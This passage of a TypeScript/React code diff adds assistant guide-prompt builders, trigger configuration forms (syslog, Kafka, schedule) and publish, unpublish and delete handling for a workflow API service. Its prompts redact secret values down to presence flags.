+  const publish = asObject(raw.publish ?? raw.api); // `publish` wins over `api`; non-object values become {}.
+  if (isTemplateApiMode(publish.type)) { // NOTE(review): this branch ignores publish.enabled === false, unlike the next one; confirm that is intended.
+    return true;
+  }
+  if (Object.keys(publish).length > 0 && publish.enabled !== false) { // Any non-empty block counts unless explicitly disabled.
+    return true;
+  }
+  if (templateTriggerEntries(config).some((item) => isTemplateApiMode((item as JsonObject).type))) { // An API-typed entry in the trigger list also counts.
+    return true;
+  }
+  const modes = templateModes(config);
+  return Array.from(modes).some((mode) => TEMPLATE_API_MODES.has(mode)); // Last resort: the declared mode/capability tokens.
+}
+
+function templateTriggerEntries(config?: WorkflowIntegrationConfig | null): unknown[] { // Raw trigger list: `triggers` if it is an array, else `integrations` if it is, else [].
+  const raw = (config ?? {}) as JsonObject;
+  if (Array.isArray(raw.triggers)) return raw.triggers;
+  return Array.isArray(raw.integrations) ? raw.integrations : [];
+}
+
+function isTemplateApiMode(value: unknown): boolean { // True when the normalized value is one of TEMPLATE_API_MODES.
+  return TEMPLATE_API_MODES.has(normalizeMode(value));
+}
+
+function templateTriggers(config?: WorkflowIntegrationConfig | null): WorkflowTrigger[] { // Typed, non-API trigger entries of the template, each guaranteed to carry an id.
+  const isTrigger = (entry: unknown): entry is WorkflowTrigger =>
+    Boolean(entry && typeof entry === 'object' && (entry as WorkflowTrigger).type);
+  const nonApi = templateTriggerEntries(config).filter(isTrigger).filter((entry) => !isTemplateApiMode(entry.type));
+  return nonApi.map((entry, position) => {
+    const ordinal = position + 1; // 1-based position among the entries that survived both filters
+    return { ...entry, id: entry.id || `${entry.type}-${ordinal}` };
+  });
+}
+
+function buildTemplateView(config?: WorkflowIntegrationConfig | null): TemplateView { // Bundles the API flag and the non-API trigger list derived from one template config.
+  return {
+    hasApi: templateHasApi(config),
+    triggers: templateTriggers(config),
+  };
+}
+
+function workflowGuidePromptParams(workflow: Workflow) { // Builds the interpolation params (ids, file paths, endpoint paths) used by the guide prompt templates.
+  const dir = workflow.source === 'global' // Global workflows live under the home directory; all others use the project-relative path.
+    ? `~/.flocks/plugins/workflows/${workflow.id}/`
+    : `.flocks/plugins/workflows/${workflow.id}/`;
+  const endpoints = workflowAPIEndpoints(workflow.id);
+  return {
+    id: workflow.id,
+    name: workflow.name,
+    dir,
+    mdPath: `${dir}workflow.md`,
+    guidePath: `${dir}${WORKFLOW_GUIDE_FILE_NAME}`,
+    configEndpoint: endpoints.config.read.replace(/^GET /, ''), // The *Endpoint params drop a leading HTTP verb; the replace is a no-op if the descriptor has none.
+    configSyncEndpoint: endpoints.config.syncFallback.replace(/^POST /, ''),
+    publishEndpoint: endpoints.apiService.publish.replace(/^POST /, ''),
+    unpublishEndpoint: endpoints.apiService.unpublish.replace(/^POST /, ''),
+    triggersEndpoint: endpoints.triggers.list.replace(/^GET /, ''),
+    apiEndpoints: formatWorkflowAPIEndpoints(workflow.id), // Full endpoint map as pretty-printed JSON.
+    configSkillName: WORKFLOW_CONFIG_SKILL_NAME,
+  };
+}
+
+function buildGuideQuestionPrompt( // Renders the 'detail.chat.welcome.guideQuestionPrompt' template and appends the backend-access guide as a second paragraph.
+  t: TranslateFn,
+  workflow: Workflow,
+  focus: string,
+  instruction: string,
+): string {
+  const promptParams = withBackendConfigAccessGuide(t, workflowGuidePromptParams(workflow));
+  return [
+    t('detail.chat.welcome.guideQuestionPrompt', {
+      ...promptParams,
+      focus,
+      instruction,
+    }),
+    promptParams.backendConfigAccessGuide, // Also available to the template above through promptParams.
+  ].join('\n\n');
+}
+
+function triggerGuideKind(type: WorkflowTriggerType): string { // Guide kind for a trigger type: the two custom_* types are shortened, every other type maps to itself.
+  const isWebhook = type === 'custom_webhook';
+  const isAdapter = type === 'custom_adapter';
+  return isWebhook ? 'webhook' : isAdapter ? 'adapter' : type;
+}
+
+function triggerGuideTranslationKey(kind: string, suffix: 'Short' | 'Desc' | 'Instruction'): string { // Builds 'detail.run.guide<Kind><suffix>', e.g. ('kafka', 'Desc') -> 'detail.run.guideKafkaDesc'.
+  const normalized = kind.charAt(0).toUpperCase() + kind.slice(1); // Only the first character is upper-cased; the rest of `kind` is kept verbatim.
+  return `detail.run.guide${normalized}${suffix}`;
+}
+
+function buildPublishGuideActions(t: TranslateFn, workflow: Workflow, view: TemplateView): PublishGuideAction[] { // One guide action per kind: the defaults first, then kinds of the template's triggers, without duplicates.
+  const actions: PublishGuideAction[] = [];
+  const seen = new Set<string>(); // Kinds already emitted; shared by both adders so each kind appears once.
+  const addApiAction = () => {
+    if (seen.has('api')) return;
+    seen.add('api');
+    const label = t('detail.run.guideApiShort');
+    actions.push({
+      key: 'api',
+      label,
+      description: t('detail.run.guideApiDesc'),
+      prompt: buildGuideQuestionPrompt(t, workflow, label, t('detail.run.guideApiInstruction')),
+    });
+  };
+  const addTriggerKindAction = (kind: string) => { // Same shape as addApiAction, with the translation keys derived from `kind`.
+    if (seen.has(kind)) return;
+    seen.add(kind);
+    const labelKey = triggerGuideTranslationKey(kind, 'Short');
+    const descriptionKey = triggerGuideTranslationKey(kind, 'Desc');
+    const instructionKey = triggerGuideTranslationKey(kind, 'Instruction');
+    const label = t(labelKey);
+    actions.push({
+      key: kind,
+      label,
+      description: t(descriptionKey),
+      prompt: buildGuideQuestionPrompt(t, workflow, label, t(instructionKey)),
+    });
+  };
+
+  DEFAULT_PUBLISH_GUIDE_KINDS.forEach((kind) => { // Defaults go first so their order is stable regardless of the template.
+    if (kind === 'api') {
+      addApiAction();
+      return;
+    }
+    addTriggerKindAction(kind);
+  });
+
+  view.triggers.forEach((trigger) => { // Template triggers only contribute kinds not covered by the defaults.
+    const kind = triggerGuideKind(trigger.type);
+    addTriggerKindAction(kind);
+  });
+
+  return actions;
+}
+
+function workflowGuideContext(workflow: Workflow): JsonObject { // Compact workflow summary embedded in card guide prompts (identity, graph sizes, sample I/O metadata).
+  return {
+    id: workflow.id,
+    name: workflow.name,
+    category: workflow.category,
+    source: workflow.source ?? 'project', // A missing source is reported as 'project'.
+    start: workflow.workflowJson.start,
+    nodeCount: workflow.workflowJson.nodes?.length ?? 0, // Counts default to 0 when the list is absent.
+    edgeCount: workflow.workflowJson.edges?.length ?? 0,
+    triggerCount: workflow.workflowJson.triggers?.length ?? 0,
+    sampleInputs: workflow.workflowJson.metadata?.sampleInputs ?? {},
+    outputSchema: workflow.workflowJson.metadata?.outputSchema ?? {},
+  };
+}
+
+function buildCardGuidePrompt( // Extends the generic guide prompt with a JSON snapshot of the current card and fixed guidance paragraphs.
+  t: TranslateFn,
+  workflow: Workflow,
+  focus: string,
+  instruction: string,
+  cardContext: JsonObject,
+): string {
+  return [
+    buildGuideQuestionPrompt(t, workflow, focus, instruction),
+    '',
+    '当前发布卡片上下文（来自 WebUI 当前状态，最终应用仍以后端配置库为准）：',
+    stringifyJson({
+      workflow: workflowGuideContext(workflow),
+      apiEndpoints: workflowAPIEndpoints(workflow.id, String(cardContext.trigger?.id ?? '{triggerId}')), // Cards without a trigger id get the literal '{triggerId}' placeholder.
+      card: cardContext,
+    }),
+    '',
+    '请结合当前工作流的功能、guide.md、workflow.md、配置库和上面的卡片上下文进行引导。优先判断当前配置是否与工作流输入/输出契约匹配；如需用户补充信息，请使用 question 工具一次只问一个最关键问题；如需应用配置，先展示相对后端配置库的 diff 并确认。',
+    '重要边界：workflow.json/config.json 里的触发器只可作为模板或兜底迁移来源，不能当作已生效配置，也不能通过修改这些文件来表示配置已生效。已生效的 API/触发器配置必须来自后端配置库或当前卡片对应的运行态记录。',
+    '如果后端配置库或运行态接口不可达，请停止配置流程，明确说明无法读取/写入配置库且本次未应用、未发布、未启动；不要继续询问用户要对 workflow.json 模板触发器做什么，也不要在普通回复里问“你希望做什么操作”。',
+  ].join('\n'); // Parts are separated by single newlines; the '' entries produce blank lines.
+}
+
+function buildApiCardGuideAction( // Builds the guide action for the API service card from the current service record and the selected driver.
+  t: TranslateFn,
+  workflow: Workflow,
+  service: WorkflowService | null,
+  selectedDriver: WorkflowServiceDriver,
+): CardGuideAction {
+  const focus = t('detail.run.cardGuideApiFocus');
+  return {
+    label: t('detail.run.cardGuideAction'),
+    description: t('detail.run.cardGuideApiDesc'),
+    displayLabel: t('detail.run.cardGuideDisplayLabel', { focus }),
+    prompt: buildCardGuidePrompt(t, workflow, focus, t('detail.run.guideApiInstruction'), {
+      capability: 'api_service',
+      selectedDriver,
+      service: service
+        ? {
+            status: service.status,
+            driver: service.driver,
+            serviceUrl: service.serviceUrl,
+            invokeUrl: service.invokeUrl,
+            apiKeyConfigured: Boolean(service.apiKey), // Only the presence of an API key is put in the prompt, not its value.
+            publishedAt: service.publishedAt,
+          }
+        : {
+            status: 'not_published', // No service record: report a synthetic status instead of null.
+          },
+    }),
+  };
+}
+
+function sanitizeTriggerAuthForPrompt(auth?: WorkflowTrigger['auth']): JsonObject { // Prompt-safe view of trigger auth: type, locator fields, and presence flags for secret-like fields.
+  // Substrings, matched against the lower-cased alphanumeric-only key, that mark a field as secret-like.
+  const secretMarkers = [
+    'apikey',
+    'secret',
+    'token',
+    'password',
+    'signature',
+  ];
+  const safeAuth: JsonObject = {
+    type: String(auth?.type ?? 'none'),
+  };
+  for (const [name, raw] of Object.entries(auth ?? {})) {
+    if (name === 'type') {
+      continue; // already captured above
+    }
+    if (name === 'headerName' || name === 'queryParam') {
+      safeAuth[name] = raw; // locator fields are copied through unchanged
+      continue;
+    }
+    const flattened = name.toLowerCase().replace(/[^a-z0-9]/g, '');
+    if (secretMarkers.some((marker) => flattened.includes(marker))) {
+      safeAuth[`${name}Configured`] = Boolean(raw); // expose presence only, never the value
+    }
+  }
+  return safeAuth; // any other key is dropped
+}
+
+function buildTriggerCardGuideAction( // Builds the guide action for one trigger card, embedding the trigger's current settings in the prompt.
+  t: TranslateFn,
+  workflow: Workflow,
+  trigger: WorkflowTrigger,
+  status?: JsonObject,
+  inputsText?: string,
+): CardGuideAction {
+  const kind = triggerGuideKind(trigger.type);
+  const focus = t(triggerGuideTranslationKey(kind, 'Short')); // Translated short label of the trigger kind; reused as label text and prompt focus.
+  return {
+    label: t('detail.run.cardGuideAction'),
+    description: t('detail.run.cardGuideTriggerDesc', { trigger: focus }),
+    displayLabel: t('detail.run.cardGuideDisplayLabel', { focus }),
+    prompt: buildCardGuidePrompt(t, workflow, focus, t(triggerGuideTranslationKey(kind, 'Instruction')), {
+      capability: 'trigger',
+      triggerType: trigger.type,
+      triggerLabel: focus,
+      trigger: {
+        id: trigger.id,
+        name: trigger.name,
+        enabled: Boolean(trigger.enabled),
+        source: trigger.source ?? {}, // NOTE(review): forwarded as-is, unlike auth below; confirm source never carries credentials.
+        auth: sanitizeTriggerAuthForPrompt(trigger.auth), // Secret values are reduced to presence flags.
+        mapping: trigger.mapping ?? {},
+        runtime: trigger.runtime ?? {},
+        inputs: trigger.inputs ?? {},
+        inputsText, // Presumably the raw editor text for inputs; verify against the caller.
+      },
+      status: status ?? null,
+    }),
+  };
+}
+
+function CardGuidePanel({ // Panel with a title, the action's description, and one button that forwards the action's prompt.
+  action,
+  onGuidePrompt,
+}: {
+  action: CardGuideAction; // Supplies the description, button label, prompt and display label.
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void; // Called with (action.prompt, action.displayLabel) on click.
+}) {
+  const { t } = useTranslation('workflow');
+  if (!onGuidePrompt) return null; // Without a prompt sink the panel is not rendered at all.
+  return (
+    <div className="rounded-lg border border-gray-200 bg-gray-50 px-3 py-3">
+      <div className="flex items-center justify-between gap-3">
+        <div className="flex min-w-0 items-start gap-2">
+          <span className="mt-0.5 inline-flex h-7 w-7 flex-shrink-0 items-center justify-center rounded-lg border border-gray-200 bg-white text-gray-600">
+            <Bot className="h-3.5 w-3.5" />
+          </span>
+          <div className="min-w-0">
+            <div className="text-xs font-semibold text-zinc-800">{t('detail.run.cardGuideTitle')}</div>
+            <div className="mt-0.5 text-[11px] leading-relaxed text-zinc-500">{action.description}</div>
+          </div>
+        </div>
+        <button
+          type="button"
+          onClick={() => onGuidePrompt(action.prompt, action.displayLabel)}
+          className="inline-flex h-8 flex-shrink-0 items-center gap-1.5 rounded-lg border border-gray-200 bg-white px-3 text-xs font-semibold text-gray-700 hover:border-gray-300 hover:bg-gray-50"
+        >
+          <Bot className="h-3.5 w-3.5" />
+          {action.label}
+        </button>
+      </div>
+    </div>
+  );
+}
+
+function PublishGuidePanel({ // Lists the publish guide actions as buttons, in a centered 'empty' layout or a compact 'inline' one.
+  actions,
+  onGuidePrompt,
+  variant = 'inline',
+}: {
+  actions: PublishGuideAction[]; // One button plus info icon is rendered per action.
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void; // Called with (action.prompt, action.label) on click.
+  variant?: 'empty' | 'inline'; // Selects layout classes and the data-testid only.
+}) {
+  const { t } = useTranslation('workflow');
+  const isEmpty = variant === 'empty';
+  const hasActionButtons = Boolean(onGuidePrompt && actions.length > 0);
+
+  if (!hasActionButtons) return null; // Nothing is rendered without a prompt sink or without actions.
+
+  return (
+    <div className={
+      isEmpty
+        ? 'mx-auto w-full rounded-xl border border-zinc-200 bg-white px-5 py-5 text-center shadow-sm'
+        : 'rounded-lg border border-zinc-200 bg-zinc-50/60 px-3 py-2'
+    }>
+      <div className={
+        isEmpty
+          ? 'mb-4 flex flex-col items-center gap-2'
+          : 'mb-2 flex items-start gap-2'
+      }>
+        <span className={`${isEmpty ? 'h-9 w-9' : 'mt-0.5 h-7 w-7'} inline-flex flex-shrink-0 items-center justify-center rounded-lg border border-rose-100 bg-rose-50 text-rose-500`}>
+          <Bot className="h-3.5 w-3.5" />
+        </span>
+        <div className="min-w-0">
+          <div className={`${isEmpty ? 'text-sm' : 'text-xs'} font-semibold text-zinc-800`}>
+            {t('detail.run.guidePanelTitle')}
+          </div>
+          <div className={`${isEmpty ? 'mt-1' : 'mt-0.5'} text-[11px] leading-relaxed text-zinc-500`}>
+            {t('detail.run.guidePanelDesc')}
+          </div>
+        </div>
+      </div>
+      <div
+        data-testid={isEmpty ? 'publish-guide-actions-empty' : 'publish-guide-actions-inline'}
+        className={
+          isEmpty
+            ? 'mx-auto flex w-full max-w-[360px] min-w-0 flex-col gap-2'
+            : 'flex min-w-0 flex-wrap items-center gap-1.5'
+        }
+      >
+        {actions.map((action) => (
+          <div
+            key={action.key}
+            className={`${isEmpty ? 'w-full justify-between px-3' : 'min-w-fit px-2.5'} group inline-flex h-8 items-center gap-1.5 rounded-lg border border-zinc-200 bg-white text-left text-zinc-700 transition-colors hover:border-rose-200 hover:bg-rose-50/80 hover:text-rose-600`}
+          >
+            <button
+              type="button"
+              onClick={() => onGuidePrompt?.(action.prompt, action.label)}
+              className="whitespace-nowrap text-xs font-semibold leading-none"
+            >
+              {action.label}
+            </button>
+            <GuideInfoIcon label={action.label} description={action.description} />
+          </div>
+        ))}
+      </div>
+    </div>
+  );
+}
 
 function SectionHeader({
   title,
@@ -73,6 +521,24 @@ function SectionHeader({
   );
 }
 
+function CapabilityTypePill({ children }: { children: ReactNode }) { // Small gray rounded pill that wraps whatever children it is given.
+  return (
+    <span className="inline-flex h-5 items-center rounded-full bg-gray-100 px-2 text-[11px] font-medium text-gray-600">
+      {children}
+    </span>
+  );
+}
+
+function EnabledStatusPill({ active }: { active: boolean }) { // Green pill when active, gray otherwise. NOTE(review): the two labels are literals, not t() keys like the rest of the file.
+  return (
+    <span className={`inline-flex h-5 items-center rounded-full px-2 text-[11px] font-medium ${
+      active ? 'bg-green-100 text-green-700' : 'bg-gray-100 text-gray-500'
+    }`}>
+      {active ? '启用' : '停用'}
+    </span>
+  );
+}
+
 function Field({
   label,
   children,
@@ -119,6 +585,164 @@ function TextArea(props: TextareaHTMLAttributes<HTMLTextAreaElement>) {
   );
 }
 
+function SyslogTriggerFields({ // Form fields for a syslog trigger: protocol, format, host, port and the input key.
+  source,
+  inputKey,
+  onSourceChange,
+  onInputKeyChange,
+}: {
+  source: JsonObject; // Current source settings; missing fields are displayed with the defaults used below.
+  inputKey: string;
+  onSourceChange: (patch: JsonObject) => void; // Receives only the changed field(s), not the whole source.
+  onInputKeyChange: (key: string) => void; // An emptied field is reported as 'syslog_message'.
+}) {
+  return (
+    <div className="grid grid-cols-1 gap-3">
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="协议">
+          <Select value={String(source.protocol ?? 'udp')} onChange={(e) => onSourceChange({ protocol: e.target.value })}>
+            <option value="udp">UDP</option>
+            <option value="tcp">TCP</option>
+          </Select>
+        </Field>
+        <Field label="格式">
+          <Select value={String(source.format ?? 'auto')} onChange={(e) => onSourceChange({ format: e.target.value })}>
+            <option value="auto">auto</option>
+            <option value="rfc3164">rfc3164</option>
+            <option value="rfc5424">rfc5424</option>
+          </Select>
+        </Field>
+      </div>
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="Host">
+          <Input value={String(source.host ?? '0.0.0.0')} onChange={(e) => onSourceChange({ host: e.target.value })} />
+        </Field>
+        <Field label="Port">
+          <Input
+            type="number"
+            min={1}
+            value={String(source.port ?? 5140)}
+            onChange={(e) => { const port = Number.parseInt(e.target.value, 10); onSourceChange({ port: Number.isNaN(port) ? 5140 : Math.min(65535, Math.max(1, port)) }); }}
+          />
+        </Field>
+      </div>
+      <Field label="Input Key">
+        <Input value={inputKey} onChange={(e) => onInputKeyChange(e.target.value || 'syslog_message')} />
+      </Field>
+    </div>
+  );
+}
+
+function KafkaTriggerFields({ // Form fields for a Kafka trigger: broker, topic, group id, input key and offset-reset policy.
+  source,
+  inputKey,
+  onSourceChange,
+  onInputKeyChange,
+}: {
+  source: JsonObject; // Current source settings; missing text fields are displayed as empty strings.
+  inputKey: string;
+  onSourceChange: (patch: JsonObject) => void; // Receives only the changed field, not the whole source.
+  onInputKeyChange: (key: string) => void; // An emptied field is reported as 'kafka_message'.
+}) {
+  return (
+    <div className="grid grid-cols-1 gap-3">
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="Broker">
+          <Input value={String(source.inputBroker ?? '')} onChange={(e) => onSourceChange({ inputBroker: e.target.value })} />
+        </Field>
+        <Field label="Topic">
+          <Input value={String(source.inputTopic ?? '')} onChange={(e) => onSourceChange({ inputTopic: e.target.value })} />
+        </Field>
+      </div>
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="Group ID">
+          <Input value={String(source.inputGroupId ?? '')} onChange={(e) => onSourceChange({ inputGroupId: e.target.value })} />
+        </Field>
+        <Field label="Input Key">
+          <Input value={inputKey} onChange={(e) => onInputKeyChange(e.target.value || 'kafka_message')} />
+        </Field>
+      </div>
+      <Field label="Offset Reset">
+        <Select value={String(source.autoOffsetReset ?? 'latest')} onChange={(e) => onSourceChange({ autoOffsetReset: e.target.value })}>
+          <option value="latest">latest</option>
+          <option value="earliest">earliest</option>
+        </Select>
+      </Field>
+    </div>
+  );
+}
+
+function ScheduleTriggerFields({ // Form fields for a schedule trigger: cron or interval mode, execution timeout, and the no-overlap flag.
+  source,
+  runtime,
+  onSourceChange,
+  onRuntimeChange,
+}: {
+  source: JsonObject; // Holds mode plus either cron or intervalSeconds.
+  runtime: JsonObject; // Holds timeoutSeconds and noOverlap.
+  onSourceChange: (patch: JsonObject) => void; // Receives only the changed fields; the inactive schedule field is sent as undefined on mode switch.
+  onRuntimeChange: (patch: JsonObject) => void;
+}) {
+  const mode = source.mode ?? (source.cron ? 'cron' : 'interval'); // Without an explicit mode, a stored cron expression implies cron mode.
+  const toPositiveInt = (raw: unknown, fallback: number): number => { // NaN-safe parse: unparsable input (e.g. '' or '.5') yields the fallback instead of NaN.
+    const parsed = Number.parseInt(String(raw ?? ''), 10);
+    return Number.isNaN(parsed) ? fallback : Math.max(1, parsed);
+  };
+  return (
+    <div className="grid grid-cols-1 gap-3">
+      <div className="grid grid-cols-2 gap-3">
+        <Field label="调度模式">
+          <Select
+            value={String(mode)}
+            onChange={(e) => {
+              const nextMode = e.target.value;
+              if (nextMode === 'cron') {
+                onSourceChange({ mode: nextMode, cron: String(source.cron ?? '*/5 * * * *'), intervalSeconds: undefined });
+                return;
+              }
+              onSourceChange({ mode: nextMode, intervalSeconds: toPositiveInt(source.intervalSeconds, 300), cron: undefined });
+            }}
+          >
+            <option value="interval">Interval</option>
+            <option value="cron">Cron</option>
+          </Select>
+        </Field>
+        <Field label="执行超时（秒）">
+          <Input
+            type="number"
+            min={1}
+            value={String(runtime.timeoutSeconds ?? 7200)}
+            onChange={(e) => onRuntimeChange({ timeoutSeconds: toPositiveInt(e.target.value, 7200) })}
+          />
+        </Field>
+      </div>
+      {mode === 'cron' ? (
+        <Field label="Cron 表达式">
+          <Input value={String(source.cron ?? '')} onChange={(e) => onSourceChange({ cron: e.target.value })} placeholder="*/5 * * * *" />
+        </Field>
+      ) : (
+        <Field label="轮询间隔（秒）">
+          <Input
+            type="number"
+            min={1}
+            value={String(source.intervalSeconds ?? 300)}
+            onChange={(e) => onSourceChange({ intervalSeconds: toPositiveInt(e.target.value, 300) })}
+          />
+        </Field>
+      )}
+      <label className="flex items-center gap-2 text-xs text-gray-600">
+        <input
+          type="checkbox"
+          checked={Boolean(runtime.noOverlap ?? true)}
+          onChange={(e) => onRuntimeChange({ noOverlap: e.target.checked })}
+          className="rounded border-gray-300 text-red-600 focus:ring-red-500"
+        />
+        禁止重叠执行
+      </label>
+    </div>
+  );
+}
+
 function stringifyJson(value: unknown): string {
   if (!value || typeof value !== 'object' || Array.isArray(value)) {
     return DEFAULT_JSON_TEXT;
@@ -149,6 +773,10 @@ function maskedValue(value?: string, visible?: boolean): string {
   return `${value.slice(0, 4)}${'*'.repeat(Math.max(0, value.length - 8))}${value.slice(-4)}`;
 }
 
+function normalizeServiceDriver(driver?: string | null): WorkflowServiceDriver { // Only the exact string 'docker' selects docker; every other value, including null/undefined, maps to 'local'.
+  return driver === 'docker' ? 'docker' : 'local';
+}
+
 function cloneTrigger(trigger: WorkflowTrigger): WorkflowTrigger {
   return JSON.parse(JSON.stringify(trigger));
 }
@@ -297,61 +925,191 @@ function createTriggerDraft(
   };
 }
 
-function PublishSection({ workflowId }: { workflowId: string }) {
+function PublishSection({
+  workflow,
+  workflowId,
+  onGuidePrompt,
+}: {
+  workflow: Workflow;
+  workflowId: string;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
+}) {
   const { t } = useTranslation('workflow');
   const [expanded, setExpanded] = useState(true);
   const [service, setService] = useState<WorkflowService | null>(null);
   const [loading, setLoading] = useState(true);
   const [publishing, setPublishing] = useState(false);
   const [stopping, setStopping] = useState(false);
+  const [deleting, setDeleting] = useState(false);
   const [error, setError] = useState('');
   const [driver, setDriver] = useState<WorkflowServiceDriver>('local');
   const [apiKeyVisible, setApiKeyVisible] = useState(false);
+  const [configExpanded, setConfigExpanded] = useState(false);
+  const operationSeqRef = useRef(0);
+  const serviceDriver = service ? normalizeServiceDriver(service.driver) : null;
+  const driverChanged = Boolean(serviceDriver && driver !== serviceDriver);
+
+  const applyService = useCallback((nextService: WorkflowService | null) => {
+    setService(nextService);
+    if (nextService) {
+      setDriver(normalizeServiceDriver(nextService.driver));
+    }
+  }, []);
 
   const loadService = useCallback(async () => {
     try {
       const res = await workflowAPI.getService(workflowId);
-      setService(res.data);
-      if (res.data?.driver === 'local' || res.data?.driver === 'docker') {
-        setDriver(res.data.driver);
-      }
+      applyService(res.data);
     } catch {
-      setService(null);
+      applyService(null);
     } finally {
       setLoading(false);
     }
-  }, [workflowId]);
+  }, [applyService, workflowId]);
 
   useEffect(() => {
     loadService();
   }, [loadService]);
 
   const handlePublish = async () => {
+    const operationSeq = operationSeqRef.current + 1;
+    operationSeqRef.current = operationSeq;
     setPublishing(true);
     setError('');
     try {
       const res = await workflowAPI.publish(workflowId, { driver });
-      setService(res.data);
+      if (operationSeqRef.current === operationSeq) {
+        applyService(res.data);
+      }
     } catch (err: unknown) {
-      setError(extractErrorMessage(err, t('detail.run.publishFailed')));
+      if (operationSeqRef.current === operationSeq) {
+        setError(extractErrorMessage(err, t('detail.run.publishFailed')));
+      }
     } finally {
-      setPublishing(false);
+      if (operationSeqRef.current === operationSeq) {
+        setPublishing(false);
+      }
     }
   };
 
   const handleUnpublish = async () => {
+    const operationSeq = operationSeqRef.current + 1;
+    operationSeqRef.current = operationSeq;
+    setPublishing(false);
     setStopping(true);
     setError('');
     try {
       await workflowAPI.unpublish(workflowId);
-      await loadService();
+      if (operationSeqRef.current === operationSeq) {
+        await loadService();
+      }
+    } catch (err: unknown) {
+      if (operationSeqRef.current === operationSeq) {
+        setError(extractErrorMessage(err, t('detail.run.stopFailed')));
+      }
+    } finally {
+      if (operationSeqRef.current === operationSeq) {
+        setStopping(false);
+      }
+    }
+  };
+
+  const handleDeleteService = async () => {
+    if (!window.confirm(t('detail.run.deleteServiceConfirm'))) {
+      return;
+    }
+    const operationSeq = operationSeqRef.current + 1;
+    operationSeqRef.current = operationSeq;
+    setPublishing(false);
+    setDeleting(true);
+    setError('');
+    try {
+      await workflowAPI.deleteService(workflowId);
+      if (operationSeqRef.current === operationSeq) {
+        applyService(null);
+      }
     } catch (err: unknown) {
-      setError(extractErrorMessage(err, t('detail.run.stopFailed')));
+      if (operationSeqRef.current === operationSeq) {
+        setError(extractErrorMessage(err, t('detail.run.deleteServiceFailed')));
+      }
     } finally {
-      setStopping(false);
+      if (operationSeqRef.current === operationSeq) {
+        setDeleting(false);
+      }
     }
   };
 
+  const renderDeleteButton = () => (
+    <button
+      type="button"
+      onClick={handleDeleteService}
+      disabled={deleting || stopping || publishing}
+      aria-label={t('detail.run.deleteService')}
+      title={t('detail.run.deleteService')}
+      className={CARD_ACTION_DANGER_BUTTON_CLASS}
+    >
+      <Trash2 className="h-3.5 w-3.5" />
+      <span>{deleting ? '删除中' : '删除'}</span>
+    </button>
+  );
+
+  const renderConfigButton = () => (
+    <button
+      type="button"
+      onClick={() => setConfigExpanded((value) => !value)}
+      aria-expanded={configExpanded}
+      className={CARD_ACTION_NEUTRAL_BUTTON_CLASS}
+    >
+      {configExpanded ? <ChevronDown className="h-3.5 w-3.5" /> : <ChevronRight className="h-3.5 w-3.5" />}
+      <span>配置</span>
+    </button>
+  );
+
+  const renderDriverSelector = (options?: { showApply?: boolean }) => (
+    <div>
+      <div className="mb-2 text-xs font-medium text-zinc-500">{t('detail.run.serviceDriver')}</div>
+      <div className="flex flex-wrap items-center gap-2">
+        <div className="inline-flex rounded-lg border border-gray-200 bg-gray-50 p-0.5">
+          {(['local', 'docker'] as WorkflowServiceDriver[]).map((item) => {
+            const selected = driver === item;
+            return (
+              <button
+                key={item}
+                type="button"
+                onClick={() => setDriver(item)}
+                disabled={publishing || stopping || deleting}
+                className={`inline-flex h-8 items-center gap-2 rounded-md px-3 text-xs font-medium transition-colors disabled:cursor-not-allowed disabled:opacity-50 ${
+                  selected
+                    ? 'bg-white text-gray-900 shadow-sm'
+                    : 'text-gray-500 hover:text-gray-800'
+                }`}
+              >
+                {selected ? <Check className="h-3.5 w-3.5 text-gray-700" /> : null}
+                <span>{item === 'local' ? t('detail.run.driverLocal') : t('detail.run.driverDocker')}</span>
+              </button>
+            );
+          })}
+        </div>
+        {options?.showApply && driverChanged ? (
+          <button
+            type="button"
+            onClick={handlePublish}
+            disabled={publishing || stopping || deleting}
+            className="inline-flex h-8 items-center justify-center gap-1.5 whitespace-nowrap rounded-lg border border-gray-200 bg-white px-3 text-xs font-medium text-gray-700 hover:border-gray-300 hover:bg-gray-50 disabled:opacity-60"
+          >
+            <Rocket className="h-3.5 w-3.5" />
+            {publishing ? t('detail.run.publishing') : t('detail.run.applyDriver')}
+          </button>
+        ) : null}
+      </div>
+      <div className="mt-2 text-[11px] leading-relaxed text-zinc-500">
+        {driver === 'local' ? t('detail.run.driverLocalDesc') : t('detail.run.driverDockerDesc')}
+      </div>
+    </div>
+  );
+
+  const apiGuideAction = buildApiCardGuideAction(t, workflow, service, driver);
+
   return (
     <div className="border-b border-gray-100">
       <SectionHeader
@@ -367,78 +1125,137 @@ function PublishSection({ workflowId }: { workflowId: string }) {
               <Loader2 className="w-3.5 h-3.5 animate-spin" />
               加载中...
             </div>
-          ) : service && service.status !== 'stopped' ? (
+          ) : service ? (
             <div className="space-y-3">
-              <div className="rounded-xl border border-gray-200 bg-gray-50 px-3 py-3 space-y-3">
-                <div className="flex items-center justify-between text-xs">
-                  <span className="text-gray-500">运行方式</span>
-                  <span className="font-medium text-gray-700">
-                    {service.driver === 'docker' ? t('detail.run.driverDocker') : t('detail.run.driverLocal')}
-                  </span>
-                </div>
-                <div>
-                  <div className="text-xs text-gray-500 mb-1">Invoke URL</div>
-                  <div className="flex items-center gap-2 rounded-lg bg-white border border-gray-200 px-2 py-2">
-                    <span className="min-w-0 flex-1 truncate font-mono text-xs text-gray-700">{service.invokeUrl}</span>
-                    <CopyButton text={service.invokeUrl ?? ''} />
+              <div
+                data-testid="api-publish-card"
+                className={`rounded-xl border bg-white transition-colors ${
+                  configExpanded
+                    ? 'border-gray-300'
+                    : 'border-gray-200 hover:bg-gray-50'
+                }`}
+              >
+                <div className="grid grid-cols-1 items-center gap-4 px-4 py-4 sm:grid-cols-[minmax(0,1fr)_276px]">
+                  <button
+                    type="button"
+                    onClick={() => setConfigExpanded((value) => !value)}
+                    className="flex min-h-[82px] min-w-0 flex-col justify-between text-left"
+                  >
+                    <div>
+                      <div className="truncate text-sm font-semibold text-gray-900">API 服务</div>
+                      <div className="mt-1 truncate text-[11px] text-gray-500">
+                        {service.driver === 'docker' ? t('detail.run.driverDocker') : t('detail.run.driverLocal')}
+                      </div>
+                      <div className="mt-1 truncate text-[11px] text-gray-400">ID: api-service</div>
+                    </div>
+                    <div className="mt-3 flex flex-wrap items-center gap-2">
